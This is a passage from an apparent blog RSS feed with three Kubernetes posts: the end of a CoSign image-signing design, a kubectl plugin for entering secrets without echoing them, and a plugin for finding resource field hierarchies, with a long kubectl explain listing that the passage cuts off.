<td>If we use different root keys, target keys, delegation keys, and so on in different data centers, that violates the basic trust principle, single source of truth.</td><td>CoSign allows us to ensure we follow the single source of truth principle.</td></tr>
</tbody>
</table>
</div><h2 id="heading-image-signing">Image signing</h2>
<ol>
<li>After key generation, the CI pipeline pushes private &amp; public keys to the KMS provider.</li>
<li>Private keys pulled from KMS &amp; stored in CI secret store.</li>
<li>We use the CI pipeline to sign images with private keys and push them to the registry.</li>
</ol>
<h2 id="heading-image-validation">Image validation</h2>
<p>We need to validate the signature of the images before deployment. We will use <code>ValidatingWebHook</code> in Kubernetes to verify the signatures.</p>
<ol>
<li>Create a <code>ValidatingWebHook</code> to validate the image. <a target="_blank" href="https://github.com/rewanthtammana/grumpy">Sample PoC</a></li>
<li><code>ValidatingWebHook</code> deployment fetches public key from KMS for validation.</li>
<li>If a signature exists, it allows the deployment, else it rejects the deployment request.</li>
</ol>
<h2 id="heading-validatingwebhook">ValidatingWebHook</h2>
<p><code>ValidatingWebHook</code> can be a SPOF (Single Point of Failure). So, precautionary measures should be taken to ensure it doesn't go down.</p>
<ol>
<li>Health checks at 30-second intervals using liveness probes. If the webhook is down, kill the pod &amp; spin up a new one.</li>
<li>Enable HPA (Horizontal Pod Autoscaler) for this deployment. In production, the traffic is very high. </li>
<li>Every deployment/pod creation in the Kubernetes cluster hits our <code>ValidatingWebHook</code> pod for image validation. Mandatory to have multiple pods to handle the load.</li>
</ol>
<h2 id="heading-key-managementrotation">Key Management/Rotation</h2>
<p>To comply with security guidelines, it's better to automate the key rotation process using pipelines.</p>
<ol>
<li>Build pipelines should have a script to retrieve the list of all signed images from the repository.</li>
<li>A clean-up has to be done on all the signature data in the registry.</li>
<li>A new key-pair needs to be created using pipeline &amp; the keys to be sent to the KMS provider.</li>
<li>Pull the private key from KMS &amp; put it in the CI secret store.</li>
<li>From step 1, we have the list of previously signed images. Re-sign all the images with the new private key &amp; push them to the registry.</li>
</ol>
<h2 id="heading-poc">POC</h2>
<p>Hands-on experience: <a target="_blank" href="https://github.com/rewanthtammana/grumpy">https://github.com/rewanthtammana/grumpy</a></p>
<h2 id="heading-conclusion">Conclusion</h2>
<p>Considering the design, usage, maintenance &amp; architectural edges, CoSign is undoubtedly a better choice to achieve our goal.</p>
]]></content:encoded></item><item><title><![CDATA[Kubectl Whisper Secrets: Create Kubernetes Secrets With Secure Input]]></title><description><![CDATA[This blog post focuses on a plugin that allows end user to "Create Kubernetes secrets by taking secure input from the console".
The in-line secret creation feature in Kubernetes is vulnerable to shoulder surfing attacks. In this blog, we will

Glance...]]></description><link>https://blog.rewanthtammana.com/kubectl-whisper-secrets-create-kubernetes-secrets-with-secure-input</link><guid isPermaLink="true">https://blog.rewanthtammana.com/kubectl-whisper-secrets-create-kubernetes-secrets-with-secure-input</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Go Language]]></category><category><![CDATA[automation]]></category><category><![CDATA[plugins]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Wed, 03 Nov 2021 12:11:53 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1634406419822/-LnabVNc2.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>This blog post focuses on a plugin that allows end user to "Create Kubernetes secrets by taking secure input from the console".</p>
<p>The in-line secret creation feature in Kubernetes is vulnerable to shoulder surfing attacks. In this blog, we will</p>
<ul>
<li>Glance through the features to create Kubernetes secrets</li>
<li>Analyze the risks with default approach</li>
<li>Get introduced to the plugin that fixes this problem</li>
</ul>
<p><strong>Github link of the plugin:</strong> <a target="_blank" href="https://github.com/rewanthtammana/kubectl-whisper-secret">rewanthtammana/kubectl-whisper-secret</a></p>
<h3 id="heading-introduction-to-kubernetes">Introduction to Kubernetes</h3>
<blockquote>
<p>Kubernetes is an open-source container orchestration system for automating application deployment, scaling, and management. kubectl provides a CLI interface to manage Kubernetes clusters. Kubectl enables the users to run different operations like describe, edit, exec, explain, logs, run, etc on Kubernetes clusters.</p>
<p>Kubernetes secret is an object that contains a small amount of sensitive data such as a password, a token, or a key. Such information might otherwise be put in a Pod specification or in a container image. Using a Secret means that you don't need to include confidential data in your application code.</p>
</blockquote>
<h3 id="heading-kubectl-cli">Kubectl CLI</h3>
<blockquote>
<p>The kubectl CLI has an extended feature called kubectl plugins - this advanced feature allows the users to develop plugins to customize kubectl functionality. I leverage this feature &amp; built this plugin to solve the inception problem.</p>
</blockquote>
<h3 id="heading-default-approach">Default approach</h3>
<p>We have different ways to create <a target="_blank" href="https://kubernetes.io/docs/concepts/configuration/secret/">Kubernetes secrets</a>. Input can be provided via</p>
<ol>
<li>CLI, <code>--from-literal</code></li>
<li>File, <code>--from-file</code></li>
<li>Env files, <code>--from-env-file</code></li>
</ol>
<p>We are more interested in the <code>--from-literal</code> feature because it's more subjected to attack. Below are a couple of examples.</p>
<h4 id="heading-creating-a-generic-secret">Creating a generic secret</h4>
<pre><code class="lang-bash">kubectl create secret generic my-secret --from-literal key1=value1 --from-literal key2=value2
</code></pre>
<h4 id="heading-creating-docker-registry-secrets">Creating docker registry secrets</h4>
<pre><code class="lang-bash">kubectl create secret docker-registry my-docker-secret --docker-password s3cur3D0ck3rP@ssw0rD --docker-username root
</code></pre>
<p>In both the above examples, the secret value is exposed via <a href="https://en.wikipedia.org/wiki/Shoulder_surfing_(computer_security)">shoulder surfing attacks</a>. This will lead to password leakage &amp; authentication bypasses.</p>
<h3 id="heading-proposed-approach">Proposed approach</h3>
<p>I leveraged the <em>kubectl plugins</em> feature &amp; built a plugin to demonstrate an alternative solution &amp; approach to this problem.</p>
<p>Instead of taking sensitive input through terminal, with the help of this plugin, you will be able to provide sensitive input.</p>
<pre><code class="lang-bash">kubectl whisper-secret generic my-secret --from-literal key1 --from-literal key2
Enter value <span class="hljs-keyword">for</span> key1: 
Enter value <span class="hljs-keyword">for</span> key2: 
secret/my-secret created
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1634403642792/6kq8O8A3N.png" alt="rewanthtammana-kubectl-whisper-secret-proposed-approach.PNG" /></p>
<h3 id="heading-bonus">Bonus</h3>
<p><code>kubectl whisper-secret</code> is now integrated with <a target="_blank" href="https://github.com/kubernetes-sigs/krew">krew</a>, a kubectl plugin manager. This plugin integration works on all platforms. So, this plugin can be installed directly with krew. It’s as simple as,</p>
<pre><code class="lang-bash">kubectl krew install whisper-secret
</code></pre>
<h3 id="heading-references">References</h3>
<ul>
<li><a target="_blank" href="https://discover.hubpages.com/technology/What-Is-Shoulder-Surfing">What is shoulder surfing?</a></li>
<li><a target="_blank" href="https://github.com/rewanthtammana/kubectl-whisper-secret">Kubectl whisper secret</a></li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Kubectl Fields: One-liner Kubernetes Resource Hierarchy Dumper]]></title><description><![CDATA[This blog post focuses on why I built the "Kubernetes resources hierarchy parser plugin". This plugin prints the hierarchy resources in one-liners & saves a ton of time for the end-users while writing or editing Kubernetes object configuration files....]]></description><link>https://blog.rewanthtammana.com/kubectl-fields-one-liner-kubernetes-resource-hierarchy-dumper</link><guid isPermaLink="true">https://blog.rewanthtammana.com/kubectl-fields-one-liner-kubernetes-resource-hierarchy-dumper</guid><category><![CDATA[Go Language]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[automation]]></category><category><![CDATA[plugins]]></category><category><![CDATA[extension]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Fri, 03 Sep 2021 11:27:26 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1630668357455/Jo8vE1em6.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>This blog post focuses on why I built the "Kubernetes resources hierarchy parser plugin". This plugin prints the hierarchy resources in one-liners &amp; saves a ton of time for the end-users while writing or editing Kubernetes object configuration files.</p>
<p><strong>Github link:</strong> <a target="_blank" href="https://github.com/rewanthtammana/kubectl-fields">https://github.com/rewanthtammana/kubectl-fields</a></p>
<h3 id="heading-problem-statement">Problem Statement</h3>
<p>For example, you want to add <code>capabilities</code>/<code>securitycontext</code> to your pod configuration. The only way to achieve this is by recursively expanding the <code>kubectl explain</code> and using the <code>grep</code> command. This default method to identify the hierarchy of specific fields for any resource in Kubernetes is cumbersome &amp; tedious.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1630670086713/N6_8Z15o_.png" alt="rewanthtammana-kubectl-fields-tedious-default-approach.png" /></p>
<h3 id="heading-introduction-to-kubernetes">Introduction to Kubernetes</h3>
<blockquote>
<p><a target="_blank" href="https://kubernetes.io/">Kubernetes</a>  is an open-source container orchestration system for automating application deployment, scaling, and management.  <a target="_blank" href="https://kubernetes.io/docs/reference/kubectl/kubectl/">kubectl</a>  provides a CLI interface to manage Kubernetes clusters. Kubectl enables the users to run different  <a target="_blank" href="https://kubernetes.io/docs/reference/kubectl/overview/#operations">operations</a>  like describe, edit, exec, explain, logs, run, etc on Kubernetes clusters.</p>
<p>Kubernetes objects can be created, updated, and deleted by writing object  <a target="_blank" href="https://kubernetes.io/docs/tasks/manage-kubernetes-objects/declarative-config/">configuration files </a> either in declarative/imperative method. Kubernetes object configuration files need to follow a pre-defined parental hierarchy structure. All the configuration files need to be addressed in the same pre-defined sequential/parental order to get processed by Kubernetes.</p>
</blockquote>
<h3 id="heading-kubectl-cli">Kubectl CLI</h3>
<blockquote>
<p>The kubectl CLI has an extended feature called <strong>kubectl plugins</strong> - this advanced feature allows the users to develop plugins to customize kubectl functionality. I leverage this feature &amp; built this plugin to solve the inception problem.</p>
</blockquote>
<h3 id="heading-default-approach">Default approach</h3>
<p>Let' say you want to add <code>capabilities</code> to your pod configuration.</p>
<p>To achieve this, the first thing is to know the hierarchy of <code>capabilities</code> for chosen resources.</p>
<p>The current/default methodology to find the hierarchical order for any field is to use <code>grep</code> or similar commands for the specific field in the terminal.</p>
<pre><code class="lang-bash">$ kubectl explain --recursive po.spec | grep capabilities
         capabilities   &lt;Object&gt;
         capabilities   &lt;Object&gt;
</code></pre>
<p>The above result shows only the matched patterns but it doesn’t show the parental hierarchy. Alternatively, the search can be extended with grep advanced functionalities.</p>
<pre><code class="lang-bash">$ kubectl explain --recursive po.spec | grep capabilities -C 5
      resources &lt;Object&gt;
         limits &lt;map[string]string&gt;
         requests       &lt;map[string]string&gt;
      securityContext   &lt;Object&gt;
         allowPrivilegeEscalation       &lt;boolean&gt;
         capabilities   &lt;Object&gt;
            add &lt;[]string&gt;
            drop        &lt;[]string&gt;
         privileged     &lt;boolean&gt;
         procMount      &lt;string&gt;
         readOnlyRootFilesystem &lt;boolean&gt;
--
      resources &lt;Object&gt;
         limits &lt;map[string]string&gt;
         requests       &lt;map[string]string&gt;
      securityContext   &lt;Object&gt;
         allowPrivilegeEscalation       &lt;boolean&gt;
         capabilities   &lt;Object&gt;
            add &lt;[]string&gt;
            drop        &lt;[]string&gt;
         privileged     &lt;boolean&gt;
         procMount      &lt;string&gt;
         readOnlyRootFilesystem &lt;boolean&gt;
</code></pre>
<p>Though the above <code>grep</code> command gives us a rough idea of the hierarchy, it doesn’t show the complete sequence and we have to print the entire output &amp; scroll through the terminal to find the right order.</p>
<details>

<summary><strong>kubectl explain –recursive po.spec (click to expand 624 lines output)</strong></summary>

<code>bash
$ kubectl explain --recursive po.spec
KIND:     Pod
VERSION:  v1

RESOURCE: spec &lt;Object&gt;

DESCRIPTION:
     Specification of the desired behavior of the pod. More info:
     https://git.k8s.io/community/contributors/devel/api-conventions.md#spec-and-status

     PodSpec is a description of a pod.

FIELDS:
   activeDeadlineSeconds    &lt;integer&gt;
   affinity    &lt;Object&gt;
      nodeAffinity    &lt;Object&gt;
         preferredDuringSchedulingIgnoredDuringExecution    &lt;[]Object&gt;
            preference    &lt;Object&gt;
               matchExpressions    &lt;[]Object&gt;
                  key    &lt;string&gt;
                  operator    &lt;string&gt;
                  values    &lt;[]string&gt;
               matchFields    &lt;[]Object&gt;
                  key    &lt;string&gt;
                  operator    &lt;string&gt;
                  values    &lt;[]string&gt;
            weight    &lt;integer&gt;
         requiredDuringSchedulingIgnoredDuringExecution    &lt;Object&gt;
            nodeSelectorTerms    &lt;[]Object&gt;
               matchExpressions    &lt;[]Object&gt;
                  key    &lt;string&gt;
                  operator    &lt;string&gt;
                  values    &lt;[]string&gt;
               matchFields    &lt;[]Object&gt;
                  key    &lt;string&gt;
                  operator    &lt;string&gt;
                  values    &lt;[]string&gt;
      podAffinity    &lt;Object&gt;
         preferredDuringSchedulingIgnoredDuringExecution    &lt;[]Object&gt;
            podAffinityTerm    &lt;Object&gt;
               labelSelector    &lt;Object&gt;
                  matchExpressions    &lt;[]Object&gt;
                     key    &lt;string&gt;
                     operator    &lt;string&gt;
                     values    &lt;[]string&gt;
                  matchLabels    &lt;map[string]string&gt;
               namespaces    &lt;[]string&gt;
               topologyKey    &lt;string&gt;
            weight    &lt;integer&gt;
         requiredDuringSchedulingIgnoredDuringExecution    &lt;[]Object&gt;
            labelSelector    &lt;Object&gt;
               matchExpressions    &lt;[]Object&gt;
                  key    &lt;string&gt;
                  operator    &lt;string&gt;
                  values    &lt;[]string&gt;
               matchLabels    &lt;map[string]string&gt;
            namespaces    &lt;[]string&gt;
            topologyKey    &lt;string&gt;
      podAntiAffinity    &lt;Object&gt;
         preferredDuringSchedulingIgnoredDuringExecution    &lt;[]Object&gt;
            podAffinityTerm    &lt;Object&gt;
               labelSelector    &lt;Object&gt;
                  matchExpressions    &lt;[]Object&gt;
                     key    &lt;string&gt;
                     operator    &lt;string&gt;
                     values    &lt;[]string&gt;
                  matchLabels    &lt;map[string]string&gt;
               namespaces    &lt;[]string&gt;
               topologyKey    &lt;string&gt;
            weight    &lt;integer&gt;
         requiredDuringSchedulingIgnoredDuringExecution    &lt;[]Object&gt;
            labelSelector    &lt;Object&gt;
               matchExpressions    &lt;[]Object&gt;
                  key    &lt;string&gt;
                  operator    &lt;string&gt;
                  values    &lt;[]string&gt;
               matchLabels    &lt;map[string]string&gt;
            namespaces    &lt;[]string&gt;
            topologyKey    &lt;string&gt;
   automountServiceAccountToken    &lt;boolean&gt;
   containers    &lt;[]Object&gt;
      args    &lt;[]string&gt;
      command    &lt;[]string&gt;
      env    &lt;[]Object&gt;
         name    &lt;string&gt;
         value    &lt;string&gt;
         valueFrom    &lt;Object&gt;
            configMapKeyRef    &lt;Object&gt;
               key    &lt;string&gt;
               name    &lt;string&gt;
               optional    &lt;boolean&gt;
            fieldRef    &lt;Object&gt;
               apiVersion    &lt;string&gt;
               fieldPath    &lt;string&gt;
            resourceFieldRef    &lt;Object&gt;
               containerName    &lt;string&gt;
               divisor    &lt;string&gt;
               resource    &lt;string&gt;
            secretKeyRef    &lt;Object&gt;
               key    &lt;string&gt;
               name    &lt;string&gt;
               optional    &lt;boolean&gt;
      envFrom    &lt;[]Object&gt;
         configMapRef    &lt;Object&gt;
            name    &lt;string&gt;
            optional    &lt;boolean&gt;
         prefix    &lt;string&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
            optional    &lt;boolean&gt;
      image    &lt;string&gt;
      imagePullPolicy    &lt;string&gt;
      lifecycle    &lt;Object&gt;
         postStart    &lt;Object&gt;
            exec    &lt;Object&gt;
               command    &lt;[]string&gt;
            httpGet    &lt;Object&gt;
               host    &lt;string&gt;
               httpHeaders    &lt;[]Object&gt;
                  name    &lt;string&gt;
                  value    &lt;string&gt;
               path    &lt;string&gt;
               port    &lt;string&gt;
               scheme    &lt;string&gt;
            tcpSocket    &lt;Object&gt;
               host    &lt;string&gt;
               port    &lt;string&gt;
         preStop    &lt;Object&gt;
            exec    &lt;Object&gt;
               command    &lt;[]string&gt;
            httpGet    &lt;Object&gt;
               host    &lt;string&gt;
               httpHeaders    &lt;[]Object&gt;
                  name    &lt;string&gt;
                  value    &lt;string&gt;
               path    &lt;string&gt;
               port    &lt;string&gt;
               scheme    &lt;string&gt;
            tcpSocket    &lt;Object&gt;
               host    &lt;string&gt;
               port    &lt;string&gt;
      livenessProbe    &lt;Object&gt;
         exec    &lt;Object&gt;
            command    &lt;[]string&gt;
         failureThreshold    &lt;integer&gt;
         httpGet    &lt;Object&gt;
            host    &lt;string&gt;
            httpHeaders    &lt;[]Object&gt;
               name    &lt;string&gt;
               value    &lt;string&gt;
            path    &lt;string&gt;
            port    &lt;string&gt;
            scheme    &lt;string&gt;
         initialDelaySeconds    &lt;integer&gt;
         periodSeconds    &lt;integer&gt;
         successThreshold    &lt;integer&gt;
         tcpSocket    &lt;Object&gt;
            host    &lt;string&gt;
            port    &lt;string&gt;
         timeoutSeconds    &lt;integer&gt;
      name    &lt;string&gt;
      ports    &lt;[]Object&gt;
         containerPort    &lt;integer&gt;
         hostIP    &lt;string&gt;
         hostPort    &lt;integer&gt;
         name    &lt;string&gt;
         protocol    &lt;string&gt;
      readinessProbe    &lt;Object&gt;
         exec    &lt;Object&gt;
            command    &lt;[]string&gt;
         failureThreshold    &lt;integer&gt;
         httpGet    &lt;Object&gt;
            host    &lt;string&gt;
            httpHeaders    &lt;[]Object&gt;
               name    &lt;string&gt;
               value    &lt;string&gt;
            path    &lt;string&gt;
            port    &lt;string&gt;
            scheme    &lt;string&gt;
         initialDelaySeconds    &lt;integer&gt;
         periodSeconds    &lt;integer&gt;
         successThreshold    &lt;integer&gt;
         tcpSocket    &lt;Object&gt;
            host    &lt;string&gt;
            port    &lt;string&gt;
         timeoutSeconds    &lt;integer&gt;
      resources    &lt;Object&gt;
         limits    &lt;map[string]string&gt;
         requests    &lt;map[string]string&gt;
      securityContext    &lt;Object&gt;
         allowPrivilegeEscalation    &lt;boolean&gt;
         capabilities    &lt;Object&gt;
            add    &lt;[]string&gt;
            drop    &lt;[]string&gt;
         privileged    &lt;boolean&gt;
         procMount    &lt;string&gt;
         readOnlyRootFilesystem    &lt;boolean&gt;
         runAsGroup    &lt;integer&gt;
         runAsNonRoot    &lt;boolean&gt;
         runAsUser    &lt;integer&gt;
         seLinuxOptions    &lt;Object&gt;
            level    &lt;string&gt;
            role    &lt;string&gt;
            type    &lt;string&gt;
            user    &lt;string&gt;
         windowsOptions    &lt;Object&gt;
            gmsaCredentialSpec    &lt;string&gt;
            gmsaCredentialSpecName    &lt;string&gt;
      stdin    &lt;boolean&gt;
      stdinOnce    &lt;boolean&gt;
      terminationMessagePath    &lt;string&gt;
      terminationMessagePolicy    &lt;string&gt;
      tty    &lt;boolean&gt;
      volumeDevices    &lt;[]Object&gt;
         devicePath    &lt;string&gt;
         name    &lt;string&gt;
      volumeMounts    &lt;[]Object&gt;
         mountPath    &lt;string&gt;
         mountPropagation    &lt;string&gt;
         name    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         subPath    &lt;string&gt;
         subPathExpr    &lt;string&gt;
      workingDir    &lt;string&gt;
   dnsConfig    &lt;Object&gt;
      nameservers    &lt;[]string&gt;
      options    &lt;[]Object&gt;
         name    &lt;string&gt;
         value    &lt;string&gt;
      searches    &lt;[]string&gt;
   dnsPolicy    &lt;string&gt;
   enableServiceLinks    &lt;boolean&gt;
   hostAliases    &lt;[]Object&gt;
      hostnames    &lt;[]string&gt;
      ip    &lt;string&gt;
   hostIPC    &lt;boolean&gt;
   hostNetwork    &lt;boolean&gt;
   hostPID    &lt;boolean&gt;
   hostname    &lt;string&gt;
   imagePullSecrets    &lt;[]Object&gt;
      name    &lt;string&gt;
   initContainers    &lt;[]Object&gt;
      args    &lt;[]string&gt;
      command    &lt;[]string&gt;
      env    &lt;[]Object&gt;
         name    &lt;string&gt;
         value    &lt;string&gt;
         valueFrom    &lt;Object&gt;
            configMapKeyRef    &lt;Object&gt;
               key    &lt;string&gt;
               name    &lt;string&gt;
               optional    &lt;boolean&gt;
            fieldRef    &lt;Object&gt;
               apiVersion    &lt;string&gt;
               fieldPath    &lt;string&gt;
            resourceFieldRef    &lt;Object&gt;
               containerName    &lt;string&gt;
               divisor    &lt;string&gt;
               resource    &lt;string&gt;
            secretKeyRef    &lt;Object&gt;
               key    &lt;string&gt;
               name    &lt;string&gt;
               optional    &lt;boolean&gt;
      envFrom    &lt;[]Object&gt;
         configMapRef    &lt;Object&gt;
            name    &lt;string&gt;
            optional    &lt;boolean&gt;
         prefix    &lt;string&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
            optional    &lt;boolean&gt;
      image    &lt;string&gt;
      imagePullPolicy    &lt;string&gt;
      lifecycle    &lt;Object&gt;
         postStart    &lt;Object&gt;
            exec    &lt;Object&gt;
               command    &lt;[]string&gt;
            httpGet    &lt;Object&gt;
               host    &lt;string&gt;
               httpHeaders    &lt;[]Object&gt;
                  name    &lt;string&gt;
                  value    &lt;string&gt;
               path    &lt;string&gt;
               port    &lt;string&gt;
               scheme    &lt;string&gt;
            tcpSocket    &lt;Object&gt;
               host    &lt;string&gt;
               port    &lt;string&gt;
         preStop    &lt;Object&gt;
            exec    &lt;Object&gt;
               command    &lt;[]string&gt;
            httpGet    &lt;Object&gt;
               host    &lt;string&gt;
               httpHeaders    &lt;[]Object&gt;
                  name    &lt;string&gt;
                  value    &lt;string&gt;
               path    &lt;string&gt;
               port    &lt;string&gt;
               scheme    &lt;string&gt;
            tcpSocket    &lt;Object&gt;
               host    &lt;string&gt;
               port    &lt;string&gt;
      livenessProbe    &lt;Object&gt;
         exec    &lt;Object&gt;
            command    &lt;[]string&gt;
         failureThreshold    &lt;integer&gt;
         httpGet    &lt;Object&gt;
            host    &lt;string&gt;
            httpHeaders    &lt;[]Object&gt;
               name    &lt;string&gt;
               value    &lt;string&gt;
            path    &lt;string&gt;
            port    &lt;string&gt;
            scheme    &lt;string&gt;
         initialDelaySeconds    &lt;integer&gt;
         periodSeconds    &lt;integer&gt;
         successThreshold    &lt;integer&gt;
         tcpSocket    &lt;Object&gt;
            host    &lt;string&gt;
            port    &lt;string&gt;
         timeoutSeconds    &lt;integer&gt;
      name    &lt;string&gt;
      ports    &lt;[]Object&gt;
         containerPort    &lt;integer&gt;
         hostIP    &lt;string&gt;
         hostPort    &lt;integer&gt;
         name    &lt;string&gt;
         protocol    &lt;string&gt;
      readinessProbe    &lt;Object&gt;
         exec    &lt;Object&gt;
            command    &lt;[]string&gt;
         failureThreshold    &lt;integer&gt;
         httpGet    &lt;Object&gt;
            host    &lt;string&gt;
            httpHeaders    &lt;[]Object&gt;
               name    &lt;string&gt;
               value    &lt;string&gt;
            path    &lt;string&gt;
            port    &lt;string&gt;
            scheme    &lt;string&gt;
         initialDelaySeconds    &lt;integer&gt;
         periodSeconds    &lt;integer&gt;
         successThreshold    &lt;integer&gt;
         tcpSocket    &lt;Object&gt;
            host    &lt;string&gt;
            port    &lt;string&gt;
         timeoutSeconds    &lt;integer&gt;
      resources    &lt;Object&gt;
         limits    &lt;map[string]string&gt;
         requests    &lt;map[string]string&gt;
      securityContext    &lt;Object&gt;
         allowPrivilegeEscalation    &lt;boolean&gt;
         capabilities    &lt;Object&gt;
            add    &lt;[]string&gt;
            drop    &lt;[]string&gt;
         privileged    &lt;boolean&gt;
         procMount    &lt;string&gt;
         readOnlyRootFilesystem    &lt;boolean&gt;
         runAsGroup    &lt;integer&gt;
         runAsNonRoot    &lt;boolean&gt;
         runAsUser    &lt;integer&gt;
         seLinuxOptions    &lt;Object&gt;
            level    &lt;string&gt;
            role    &lt;string&gt;
            type    &lt;string&gt;
            user    &lt;string&gt;
         windowsOptions    &lt;Object&gt;
            gmsaCredentialSpec    &lt;string&gt;
            gmsaCredentialSpecName    &lt;string&gt;
      stdin    &lt;boolean&gt;
      stdinOnce    &lt;boolean&gt;
      terminationMessagePath    &lt;string&gt;
      terminationMessagePolicy    &lt;string&gt;
      tty    &lt;boolean&gt;
      volumeDevices    &lt;[]Object&gt;
         devicePath    &lt;string&gt;
         name    &lt;string&gt;
      volumeMounts    &lt;[]Object&gt;
         mountPath    &lt;string&gt;
         mountPropagation    &lt;string&gt;
         name    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         subPath    &lt;string&gt;
         subPathExpr    &lt;string&gt;
      workingDir    &lt;string&gt;
   nodeName    &lt;string&gt;
   nodeSelector    &lt;map[string]string&gt;
   preemptionPolicy    &lt;string&gt;
   priority    &lt;integer&gt;
   priorityClassName    &lt;string&gt;
   readinessGates    &lt;[]Object&gt;
      conditionType    &lt;string&gt;
   restartPolicy    &lt;string&gt;
   runtimeClassName    &lt;string&gt;
   schedulerName    &lt;string&gt;
   securityContext    &lt;Object&gt;
      fsGroup    &lt;integer&gt;
      runAsGroup    &lt;integer&gt;
      runAsNonRoot    &lt;boolean&gt;
      runAsUser    &lt;integer&gt;
      seLinuxOptions    &lt;Object&gt;
         level    &lt;string&gt;
         role    &lt;string&gt;
         type    &lt;string&gt;
         user    &lt;string&gt;
      supplementalGroups    &lt;[]integer&gt;
      sysctls    &lt;[]Object&gt;
         name    &lt;string&gt;
         value    &lt;string&gt;
      windowsOptions    &lt;Object&gt;
         gmsaCredentialSpec    &lt;string&gt;
         gmsaCredentialSpecName    &lt;string&gt;
   serviceAccount    &lt;string&gt;
   serviceAccountName    &lt;string&gt;
   shareProcessNamespace    &lt;boolean&gt;
   subdomain    &lt;string&gt;
   terminationGracePeriodSeconds    &lt;integer&gt;
   tolerations    &lt;[]Object&gt;
      effect    &lt;string&gt;
      key    &lt;string&gt;
      operator    &lt;string&gt;
      tolerationSeconds    &lt;integer&gt;
      value    &lt;string&gt;
   volumes    &lt;[]Object&gt;
      awsElasticBlockStore    &lt;Object&gt;
         fsType    &lt;string&gt;
         partition    &lt;integer&gt;
         readOnly    &lt;boolean&gt;
         volumeID    &lt;string&gt;
      azureDisk    &lt;Object&gt;
         cachingMode    &lt;string&gt;
         diskName    &lt;string&gt;
         diskURI    &lt;string&gt;
         fsType    &lt;string&gt;
         kind    &lt;string&gt;
         readOnly    &lt;boolean&gt;
      azureFile    &lt;Object&gt;
         readOnly    &lt;boolean&gt;
         secretName    &lt;string&gt;
         shareName    &lt;string&gt;
      cephfs    &lt;Object&gt;
         monitors    &lt;[]string&gt;
         path    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         secretFile    &lt;string&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
         user    &lt;string&gt;
      cinder    &lt;Object&gt;
         fsType    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
         volumeID    &lt;string&gt;
      configMap    &lt;Object&gt;
         defaultMode    &lt;integer&gt;
         items    &lt;[]Object&gt;
            key    &lt;string&gt;
            mode    &lt;integer&gt;
            path    &lt;string&gt;
         name    &lt;string&gt;
         optional    &lt;boolean&gt;
      csi    &lt;Object&gt;
         driver    &lt;string&gt;
         fsType    &lt;string&gt;
         nodePublishSecretRef    &lt;Object&gt;
            name    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         volumeAttributes    &lt;map[string]string&gt;
      downwardAPI    &lt;Object&gt;
         defaultMode    &lt;integer&gt;
         items    &lt;[]Object&gt;
            fieldRef    &lt;Object&gt;
               apiVersion    &lt;string&gt;
               fieldPath    &lt;string&gt;
            mode    &lt;integer&gt;
            path    &lt;string&gt;
            resourceFieldRef    &lt;Object&gt;
               containerName    &lt;string&gt;
               divisor    &lt;string&gt;
               resource    &lt;string&gt;
      emptyDir    &lt;Object&gt;
         medium    &lt;string&gt;
         sizeLimit    &lt;string&gt;
      fc    &lt;Object&gt;
         fsType    &lt;string&gt;
         lun    &lt;integer&gt;
         readOnly    &lt;boolean&gt;
         targetWWNs    &lt;[]string&gt;
         wwids    &lt;[]string&gt;
      flexVolume    &lt;Object&gt;
         driver    &lt;string&gt;
         fsType    &lt;string&gt;
         options    &lt;map[string]string&gt;
         readOnly    &lt;boolean&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
      flocker    &lt;Object&gt;
         datasetName    &lt;string&gt;
         datasetUUID    &lt;string&gt;
      gcePersistentDisk    &lt;Object&gt;
         fsType    &lt;string&gt;
         partition    &lt;integer&gt;
         pdName    &lt;string&gt;
         readOnly    &lt;boolean&gt;
      gitRepo    &lt;Object&gt;
         directory    &lt;string&gt;
         repository    &lt;string&gt;
         revision    &lt;string&gt;
      glusterfs    &lt;Object&gt;
         endpoints    &lt;string&gt;
         path    &lt;string&gt;
         readOnly    &lt;boolean&gt;
      hostPath    &lt;Object&gt;
         path    &lt;string&gt;
         type    &lt;string&gt;
      iscsi    &lt;Object&gt;
         chapAuthDiscovery    &lt;boolean&gt;
         chapAuthSession    &lt;boolean&gt;
         fsType    &lt;string&gt;
         initiatorName    &lt;string&gt;
         iqn    &lt;string&gt;
         iscsiInterface    &lt;string&gt;
         lun    &lt;integer&gt;
         portals    &lt;[]string&gt;
         readOnly    &lt;boolean&gt;
         secretRef    &lt;Object&gt;
            name    &lt;string&gt;
         targetPortal    &lt;string&gt;
      name    &lt;string&gt;
      nfs    &lt;Object&gt;
         path    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         server    &lt;string&gt;
      persistentVolumeClaim    &lt;Object&gt;
         claimName    &lt;string&gt;
         readOnly    &lt;boolean&gt;
      photonPersistentDisk    &lt;Object&gt;
         fsType    &lt;string&gt;
         pdID    &lt;string&gt;
      portworxVolume    &lt;Object&gt;
         fsType    &lt;string&gt;
         readOnly    &lt;boolean&gt;
         volumeID    &lt;string&gt;
      projected    &lt;Object&gt;
         defaultMode    &lt;integer&gt;
         sources    &lt;[]Object&gt;
            configMap    &lt;Object&gt;
               items    &lt;[]Object&gt;
                  key    &lt;string&gt;
                  mode    &lt;integer&gt;
                  path    &lt;string&gt;
               name    &lt;string&gt;
               optional    &lt;boolean&gt;
